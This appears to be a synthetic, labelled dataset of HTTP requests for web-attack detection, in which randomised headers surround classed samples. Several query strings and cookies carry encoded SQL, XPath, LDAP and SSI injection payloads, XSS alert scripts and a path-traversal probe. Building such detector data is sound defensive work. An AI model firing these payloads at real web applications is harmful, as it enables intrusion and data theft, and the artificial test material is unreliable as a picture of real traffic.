UA-Pixels: 747x653
Via: oms/7.3 32.49.73.1, FTP/7.8 www.ncTcot4d.html
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: rshhh0/1.3
Warning: 265 126.167.150.154 "eE3Hb" "Thu, 11 Oct 07 04:38:57 UTC"
X-Forwarded-For: 166.174.206.86
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47477
Start - Id: 41627
class: SqlInjection
GET /samdropBtux@i5YkSdI/h6c8ksoerg/J0Uvg2ecoT/9xHpchildv5VBIetc8D/hRdRqmpnsalttt/Qil51ttaR_P/raoecgola.shtml?OYxk=usruowe&tS0Doeesi5p7v=5884060&nmfrky=serrsotets5deTrrey&ebit7e=i7a&HJs2rcpJS=tr2o&adAFrneeea=ry4I&oaotrfteey=0221&goqma=ahttp&cteuy8nou3=%27+or++id++++in+%28++select+*+++from+++++++user_db+++%29 HTTP/1.0
Host: www.woee.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.4, gzip;q=0.3, deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 166.71.235.134
Cookie: bttt= ovs7ai;eady8hephfe=1;8hcaaosmSR=22
Cookie2: $Version="003"
Date: Fri, 05 Dec 08 17:51:33 CET
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: 100-continue
From: enlbuaah@iDob1m.fr
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Wed, 12 Dec 07 03:25:41 GMT
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: *
If-Range: Sun, 09 Apr 06 07:14:00 CET
Max-Forwards: 0
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 537-
Referer: /nnuogsii/eoonErtm/rnlHd/1eoh.tar
TE: trailers
Trailer: Authorization
User-Agent: 4d7aled/0.8.9.1
UA-CPU: Sparc
UA-Disp: 5571,966,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: kont/4.7 183.243.55.235, 5.5 218.247.153.61, 2.9 www.rawiMqmE.css
Transfer-Encoding: identity
Upgrade: olC/3.6, enno3a/9.1, rEwh/3.6, uetIa/1.1
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 475701883207700445
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41627
Start - Id: 49458
class: XPathInjection
GET /E1IA/iL6_U0yJ.g/3M5ubRS/fkpeh/vt59AsxOQxv4Hd/i5l7G.-wLh0.kT/3lYheEtbdserfmaio1ee/nacoleo6g/iwcglhe/3Az/onNlHUqys4WY.html?kte5tZoww=b1&een7qtAp6ln=a5cF&itS=tef6tatntakmdso&e3tysed=70570++++or++ln%2FspyetH%2Fc%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+or+8453%3D&iCgeots=eEH5rphpHoojpincludedere&ncECVbdUe2position=2+4o HTTP/1.0
Host: www.hrzn.com
Connection: gT4p
Accept: text/html;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 5.36.126.231
Cookie: uciekntFmetemnl=4024;CaAyogeeh9=74;odrvgh9N=systemnhttps0a;lh=dxine;ptets1=Ee2admin;gwz=82
Cookie2: $Version="817"
Date: Wed, 16 Nov 05 09:01:26 GMT
ETag: W/"RWh5ltNrLRUdKyuJ1e"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 25 Dec 08 18:25:57 CET
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: "vRcBu9hPH_EqJcU"
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: Digest qop=auth-int
Range: -012
Referer: /aldfkga/orceeOtd/snareos/obrrey/yxoy.cfm
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.3 (compatible; MSIE 4.4; Win98; idLlXTeoea; Odooiewnt)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: identity
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49458
Start - Id: 39288
class: SSI
GET /qveiiimmobp/vo_GM4XZ.K./JJKyG/bstylelWDE/iwKj818XKoL8ev@eDM/mM9UWhX8/rr0j/dZDXbSNY6JiI/aBtrd7ciihwbe4Fun/hlweeayoywihfbtieM.jpeg?caty7AO=%3C%21--%23email+fromhost%3D%22www.reeryoa.com%22+tohost%3D%22mailbox.ea3re.com%22+message%3D%22l8elsp+5fmEes+niteNuo+OixA%22+fromaddress%3D%22amoy.com%22+toaddress%3D%22nlH.fuwhhh.com%22+subject%3D%22m%22+sender%3D%22b0.com%22+replyto%3D%22a3yxmv.com%22+cc%3D%22ei%22+inreplyto%3D%224h+ltee+ph7s%22+id%3D%22toomail%22+--%3E&aerlr=et+%3E%7Cftpxled%409R+u&nmn=1&ts25owrifai3rl=%2FcDPhaiaaaz%7Eaiiih%28%3Av&6ma0rwrinioacl=629969&m63E=ofaei&he9ed=856 HTTP/1.0
Host: www.Iltt.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ws-fa;q=0.9, nel-ytn, t-esyONTb, eMel-eg
Cache-Control: max-age=84
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Mon, 07 Jan 08 21:08:18 CET
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: pra5=4Ete
From: tdoqaue@tuogttti.uk
If-Modified-Since: Sat, 06 May 06 16:18:25 UTC
If-Unmodified-Since: Wed, 02 Nov 05 01:35:55 CET
If-Match: "HXJ5YO2A6Fz09._Jq"
If-None-Match: "LN@eV.Sh6iyn1tJ_31l"
If-Range: Tue, 14 Aug 07 19:11:14 UTC
Max-Forwards: 11
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Digest nc=e472deD1
Range: 419016-,344-
Referer: http://www.ederrh6b.uk/eaayf/ltfotsT.css
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 6.1; gc-lm; rv:8.1.1) Gecko/40579802
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: 3.3 149.30.70.113:78675, 8.6 73.154.175.194
Transfer-Encoding: deflate
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 171.227.11.27
X-Serial-Number: 729426151535484
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39288
Start - Id: 41614
class: SqlInjection
GET /4YkB_a220lTlT0/rnvlUvoTD/c0eeedbd/dltnoesCe/logTRa.gkb/rcmBMy/ualgHP1W/rrcnalkhi0s/alrlhzt4rln/l9N1xGlctVSZhD4E/m_aa9zK5gZ.yD4E4S/iQr.8vIUYn.msf?F@83U=nnfJ&aloq1nese=%27+++++%2B+%28+SELECT+++TOP+++1+++++dedlm+++++FROM++gtsa7hc5%29++++%2B++++%27&daaaQue=98&iil0dsSda=6&heNtooxen=tDdJkf&oeg1ORlnuaiihD=mochashutdown%7E4binoha2%3F+iehtpass&8hh=1&oonn=%2Btesbnnn7kftpechohopp HTTP/1.1
Host: 91.121.93.223
Connection: close
Accept: application/*, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.9, deflate;q=0.2, gzip, deflate
Accept-Language: e-6A7t, tsadCl-tt
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Sat, 14 Oct 06 10:28:55 CET
ETag: "5AYEIKIO38UMnPD"
Expect: tnEro1
From: tcssd@oays6you.com
If-Modified-Since: Fri, 12 Oct 07 03:49:35 UTC
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 805
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: In9rk gyigt=48zd
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: http://ooess8e.st/n4iv/rewx4/rwScietc.dll
TE: gzip;q=0.0
Trailer: Host
User-Agent: pEkaih8rbOt5te
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: FTP/6.2 153.50.151.102
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41614
Start - Id: 40783
class: SSI
GET /MqWYtEp/zEjVGsystemuvGtelnetg/eugs7r/vRyt1E@Ge/nLL5-/rnz/ePqEsqOrtKqTuY/oaV5D2/ht4seTvIbeiq/alclmiiddtd/H461.png?oimysyfaNxi=442&viyk=4telnet%7Etr&0atem=e&eiec=onFzW&copyCwgetT94xUTHQ=%2Fgwojy2gzworgmailexec&e6iiulaSeue=139&e2itwRrt3irEre0=oDGMMtHeN&Mowqhlet9es=5591&eoPn=iuLzT8MWdpu&cleq=3103&iyhtnm2uieeIee=wL2Xo%40&ho6a=+e%28&rett=ehi&wxr=%3C%21--+++%23odbc++++connect%3D%22yfnl%2CRc%2CaSoit%22++++statement%3D%22select+++*+from++es%22--%3E HTTP/1.1
Host: www.m6nh3amcn.fr
Connection: bbi8nnt
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: compress, gzip, compress;q=0.4, gzip;q=0.2
Accept-Language: 86hlDe-dn2kzoy, ntfob36-Agr9elt;q=0.0, wd-Hasa
Cache-Control: no-cache
Client-ip: 79.174.208.245
Cookie: cxgzeocnEe1v7rf=sh 5vrnadAs7snd;rmerUdies7i=?;GsrdsvEh1ca=hstety;tsirnEinm=108;hrP=12602782
Date: Fri, 17 Dec 04 08:53:00 GMT
ETag: W/"n6Vs6wO0z4ETSDqV3lL-"
If-Modified-Since: Sun, 07 Mar 04 02:47:18 GMT
If-Unmodified-Since: Mon, 23 Aug 04 19:05:01 GMT
If-None-Match: *
If-Range: "wuFa@D5QvVREvWeYw"
Max-Forwards: 614
Pragma: heseaoy0='ilrtlAe'
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 317784-4,80-130,625-44564
Referer: http://www.lYc1.ch/1nc9ginh/pelcsh/turre.php3
TE: trailers,trailers,trailers
User-Agent: cCd3bjG http://www.cinta.com
UA-Pixels: 593x4712
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: compress
Upgrade: vgs/0.3
X-Serial-Number: 87018152344
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40783
Start - Id: 49325
class: XPathInjection
GET /rE/e.CF77bFXK/esn/nTyohlBeTugo/aCRaDQbAM5@I6unqJ_b2/tX_hJ20w/ji@jCzKdv5PkQeks/o9006OS/tE.HPstUTC0xr3bNx/7mls7ymuennxc/idwnEy/gfeThc.pl?urettavhkauSf=iets&1stNbezuoume4yx=VhyeX6%3Dxod3Dr&anrlgap=%2B3fn&xeeccuit=paicivtp99ea&B0_uOPvKPt6Z=rrd97hoyn&ynl=oT+0kTnmn%27z&9nodcjef=lrkdple%27%5D++++%7C+P+++%7C+++++%2F%2Fuser%5B+name%2Ftext%28+%29++%3D++++%27ao4gk&ptj6t=55651&lcssb8rtr=4438520&5J1Nrmlu6goee=582865015&c0tn=wtltuntlxoat0 HTTP/1.1
Host: 233.200.126.173
Connection: close
Accept: image/png;q=0.1, video/*, text/xml
Accept-Charset: windows-1255, iso-8859-8;q=0.0, windows-874;q=0.8, euc-jp, ks_c_5601-1987
Accept-Encoding: compress;q=0.5, compress;q=0.9, compress;q=0.5, gzip;q=0.5
Accept-Language: 3i-olspriu, newroi-V;q=0.3, aEqh-t;q=0.2
Cache-Control: max-age=66551
Client-ip: 66.86.201.155
Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="864"
Date: Sun, 26 Apr 09 04:36:49 CET
ETag: "Hem3TXdN6lXp6-ZIP.x9"
Expect: dIehaWe=esyeo;tx6ezea=Ee5h3s2
From: tailcrn@aoedhlvnA.it
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sun, 11 Feb 07 13:54:07 CET
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 2
MIME-Version: 6.3
Pragma: eR5eoter=od1t8ss
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://unoks.biz/rew9ed/d7thN9/cnqop.mp3
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: c2rgxex/2.6
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 462 247.12.174.34 "laiyomneitoohpnNd1mn" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 09521
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49325
Start - Id: 48234
class: XSS
PUT /-_connecthKe/hh2tnaceik/eeicaucttfo/eaosyriydgeddeBnyu/7y.jpeg? HTTP/1.0
Content-Length: 60
Content-Language: Pro
Content-Encoding: deflate
Content-Location: /3utyraaW/aecss/ta8e/tnQceah/loeauj.swf
Content-MD5: bjBpdGV0YTlSczdqdGg4bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Oct 05 07:46:29 CET
Last-Modified: Wed, 07 Apr 10 04:40:32 UTC
Host: 180.122.228.70
Connection: i53ee
Accept: video/*, image/gif;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 112.4.101.116
Cookie: fYeiMooEaAr=lnph-i etgeyeE;3Umfeasdt=c style=left:expression(alert   (ss5eho.OG3));HqacceptRZLA=3615;h9pa=6830
Cookie2: $Version="6"
Date: Wed, 03 Feb 10 12:17:17 CET
ETag: W/"O4eyEimQ9o3CUxc2YQhb"
Expect: 100-continue
From: SPnoemq6@oee6gw4s.com
If-Modified-Since: Wed, 28 Sep 05 22:54:47 GMT
If-Unmodified-Since: Thu, 13 Aug 09 13:25:09 UTC
If-Match: *
If-None-Match: "NuBgLqIdXdGqPWIQ"
If-Range: *
Max-Forwards: 716
MIME-Version: 4.5
Pragma: e='Mltbhhhm'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic bGFseTo3YVRl
Range: -5357,217-
Referer: /rtOl3oah/oelk0d/tmte56/sn9f/inlo.fgf
TE: trailers,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.2 (Windows; U; Win98 5.9; lN-em; rv:1.7.6) Gecko/35788999
UA-CPU: StrongARM
UA-Disp: 0382,578,16
UA-Color: color32
UA-Pixels: 8720x676
Via: ataiah/7.6 44.8.18.9, HTTP/0.4 146.101.237.217:54405
Transfer-Encoding: compress
Upgrade: Eoge/5.5, mmGS/2.1, smtts/9.5
Warning: 321 244.248.253.181 "iesqnoutyAsh" "Fri, 04 Feb 05 13:45:57 CET"
X-Serial-Number: 60545098
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aoeLoghonr3jw0g=hfexec&i8aYPa=198954312&XSyincludezuyAcm=590

End - Id: 48234
Start - Id: 47337
class: XSS
GET /ec6eDKXFsHeOG/a78APoa2Y/4akrouh.php4?.WZikncOehUY=%3Ciframe++++src+++%3D++++%22vbscript%3A%5Balert++++%28%27ygs8he%27%29%3B%5D+++%22%3E&ov=location%3D12hautoexecmwwindow.openon8&rgtodgct31=5tuFndaEje0wrtSm&noastnxwstad=dwp-n HTTP/1.1
Host: 215.117.181.15
Connection: tiN9
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 88.199.53.236
Cookie: adofdsooiH37=lMj@ub5JoP;doI8fdocumentT=4962004144;i0ndaiac7=adtt8eH1tcr2sbtB;nMRo3gJhavingN=\ te wp-o;Ts6TF=coRxre;iw=iZ@x4
Cookie2: $Version="9"
Date: Sun, 28 Mar 10 13:06:58 UTC
ETag: W/"5grenAzcmdh-dh.U6"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Wed, 17 Oct 07 10:38:59 UTC
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: "Kdktep5DD.clQHSkjkz"
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 890
MIME-Version: 4.9
Pragma: l=i
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -7,-85784
Referer: http://s7gaans.net/aecurEtt.cfm
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: f84Z0u48 http://www.uollgh.ch
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 412179
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47337
Start - Id: 41668
class: SqlInjection
GET /NuKRphQ01-B.9/loBB0ER/reZm8xPc9cWr5mYO54LZ/uAsI8PESFpTQc/myahnn87bq/4_/aiuu2XX.mspx?Kn6BIsamrXSY_h=jsecat&snr2hi7fdo=ae%3C%28a&1oWjt.kJ7=347&echo8Twinnt=19&any9ualaua=ivdhsoase&eeoDstaeErea=statAa%3CE&nulms=eeaTsi&tSabnaet6liayf=45080442&awrhrsesmo=niobject9&eAnmscalooaai=%27%3B+shutdown--&uitlsem=ne&6yoheMEtdngru=un2b&rho=67623202&tp42ynn=nie HTTP/1.0
Host: 149.53.230.56
Connection: ihti
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, deflate, gzip;q=0.1
Accept-Language: Lasimeos-l2wese
Cache-Control: no-transform
Client-ip: 239.57.78.114
Cookie: hptS3hHrao=hlthaccess_logEulandm;dlaneritanped=3068105;ahntl=4I4DVC;p9l4hAv=165;PacI=1970
Cookie2: $Version="5"
Date: Sat, 20 Nov 04 13:45:33 CET
ETag: W/"pBTFR7SLhVLXj.XI"
Expect: tdqm
From: uAaSoTat@85nr5ec.org
If-Modified-Since: Fri, 11 Jun 04 13:21:13 GMT
If-Unmodified-Since: Mon, 23 Nov 09 09:06:15 GMT
If-Match: "GM1ZN0-VEzVX0@O7hz"
If-None-Match: *
If-Range: "_GAzh@j7to8Lv3f9"
Max-Forwards: 82
MIME-Version: 9.5
Pragma: rlitR9S=noasnay
Proxy-Authorization: daahrP decdjt5=wri6iree
Authorization: Digest username="tiwoSh"
Range: -91,787-299778
Referer: /uptti/ople/EiItoea.sh
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 5.1; un-it; rv:4.9.4) Gecko/23082013
UA-CPU: MIPS
UA-Disp: 2834,2406,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: 6.1 www.iedatda.js, 8.2 www.eioe.gif, FTP/0.1 227.63.33.150
Transfer-Encoding: compress
Upgrade: i2e/5.2, E6w/3.7, mge/6.8
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41668
Start - Id: 47395
class: XSS
GET /T9bmW-WX/asamrezdehpugxzi/w5/nTPPV61r00vMV5h1YM4/JPhomeJ05aaccess_log8D6/M4ls/eIa5/zpbE8hvBx7Vs.QSMGEun/akbk35u8HbWYMbiB358W/FWh.cgi?nt=adsn2oFh5HtWpetan&ritooetihe4=%3Cscript++%3Ealert+%28%27ridd.rth9hs%27%29%3C%2Fscript++%3E&o9orh51T=786354832&61ttlknbamn=zallgn%24oshavingsaequnionwpniFep&an=192&1t5lteiwAatsot=48 HTTP/1.1
Host: www.tse1esm.com
Connection: keep-alive
Accept: application/postscript
Accept-Charset: isiri-3342;q=0.3, utf-8
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="4"
Date: Wed, 10 Mar 10 04:54:04 CET
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: hoetafry@daffCU.org
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Fri, 16 Sep 05 21:30:18 GMT
If-Match: "IGzop34q3uPZrSr"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 5
MIME-Version: 0.3
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic b2ZlazEwYTE6dGZlTHUz
Range: 5469-3,1126-
Referer: http://www.enwy.cz/dietoiit/edmri4ou/lrlane/b36lao.css
TE: chunked;q=0.3,gzip;q=0.2
Trailer: Expect
User-Agent: okhisnqimpNbaeni
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: 5.0 www.qraark.shtml
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47395
Start - Id: 38227
class: LdapInjection
GET /s7/n0fg1iau2i/ORad/eNdrxru2ThaeNmhdce/eoptxnt/vaH_KV/4eeg/Qn2ple/BrcCu/hFR3HrVMSa/hO/oi3Us@MHk.html?fTinn=avfeoatese2tlsos&Etkestidtcd=hle8&79gQwbE0Isock_streamc=59&ceMnoawoz=h9e%29%28++%7C++++%28ehau%3D*%29&edmthimse=phrEoe9ctrhtNjj&Ihat3ic=reu&68dstuateel=o+uryminsert HTTP/1.0
Host: 23.185.247.241
Connection: keep-alive
Accept: application/rtf, application/*, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, gzip, deflate
Accept-Language: iun-w4;q=0.9
Cache-Control: no-cache
Client-ip: 63.201.6.101
Cookie: HF8b6http1=6389;dJuntnt=75pgekoesY9tObtvno;eenyoe3fvcc=eoin;rss=sddtypataNnoubi4;sedeed=ue;EdI57ornAnia=0975
Cookie2: $Version="541"
Date: Tue, 24 Jun 08 13:40:48 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 08 Jun 05 09:05:05 GMT
If-Unmodified-Since: Fri, 04 Sep 09 13:25:59 CET
If-Match: "l3Wr.s4F_oiop.mOHf"
If-None-Match: "MiPRWgygrTK_OII6"
If-Range: Sat, 10 Oct 09 06:00:15 GMT
Max-Forwards: 57
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: olshew aitLt=niTeot
Authorization: Basic cm9pbmVzaTptZG9zbQ==
Range: 491-,605-2708,157323-67914
Referer: http://BeAEl.uk/liasbkS/qzfut/Wnpdu.mdb
TE: trailers
Trailer: Accept-Charset
User-Agent: tbtqpdaree (cilCDFSu; tVAzR30; cz6d_r)
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4467x673
Via: FTP/9.6 153.243.239.113, HTTP/2.0 27.189.123.231, 9.2 232.132.70.100
Transfer-Encoding: kOctU; tnllhi=a1the
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 47317311019714332645
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38227
Start - Id: 42378
class: SqlInjection
GET /zO1c/ilacu/tyKQN-V9OZ6VOO2299D/o8Zim.FS39iD2_t/htaccesTt/p6Jy7UelrjbvbscriptZs/iL7_PNAQkpgMSTkyP/xqgMnerla/pC/ucT/UReu3IK.php3?dnlrvndEtn=40697381&srotuisoto=7&dsehdAE=%27+OR++%27wEm3ELoetn%27+LIKE++%27aze%2525&tlerT7Neee0jo=st&rse3ami2srxbe4=kPIF9sl&qjB@aAu0yqt-=3904734 HTTP/1.0
Host: 126.196.234.178
Connection: tOqes
Accept: */*;q=0.4
Accept-Charset: windows-1254;q=0.5, euc-kr, iso-8859-15;q=0.8, iso-8859-8-i;q=0.4, isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 237.97.207.139
Cookie: xOhttpsOi=7379
Cookie2: $Version="8"
Date: Tue, 07 Jul 09 16:58:41 GMT
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: Ee02n=ittst6sO;hlInLqdo=cld7
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Sat, 12 Sep 09 06:49:57 UTC
If-None-Match: *
If-Range: "iy7ShGIHE6lGl6h3s0DX"
Max-Forwards: 916
MIME-Version: 9.3
Authorization: oeifa renlcmT=aansato
Referer: http://hrwueew.net/pYdme1w/e0utO.gif
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 8.1; rl-ui; rv:6.2.0) Gecko/31844340
UA-Pixels: 3589x325
Via: HTTP/2.0 www.nwTt5Um.jpeg, 0.7 www.1tiIoj6A.css, 7.0 www.oiqi19.css
Warning: 305 107.162.173.32 "qpsdina83o" "Fri, 17 Nov 06 24:21:49 CET"

null

End - Id: 42378
Start - Id: 45723
class: PathTransversal
GET /VwhereYKL/lhn1sRA6ictcnnNasn/gdowygiNehdronnhc/tUm-2qHAhyUqf/e1yme/oVxbaBhpucLnGxT-xy3/ifuerThr0nmfcd7n/idkH/3eQpqsu.jpg?1STArRnxD=%5Cautoexec.bat&aKsFy=iclMsonsh%24stnov HTTP/1.1
Host: www.innifu.it
Connection: nytoh
Accept: text/*, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress;q=0.2, compress;q=0.0, compress;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 19.222.68.7
Cookie: hyie1eo8leaOepu=612368;.6Vp1rSP4itH=epi\koouth
Cookie2: $Version="66"
Date: Thu, 31 Jan 08 09:55:31 CET
ETag: W/"1HDzOZzjJta_eti"
Expect: E8io1m=9m68xA;ctn5kTae=znnvtbd
From: reani1tb@daeireeubl.de
If-Modified-Since: Tue, 06 Feb 07 04:58:23 CET
If-Unmodified-Since: Fri, 08 Sep 06 24:58:48 UTC
If-Match: *
If-None-Match: *
If-Range: "W4xl8_6kHpFOOQb"
Max-Forwards: 1148
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest opaque="pTar"
Range: -500252,934-3694
Referer: http://www.Afrgmi.uk/zrGtm5s/5sOsee/yFbup/iaaed/iu5l.tiff
TE: chunked;q=0.2,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 3.2; ht-so; rv:9.8.7) Gecko/51964169
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 534x391
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 159.195.9.102
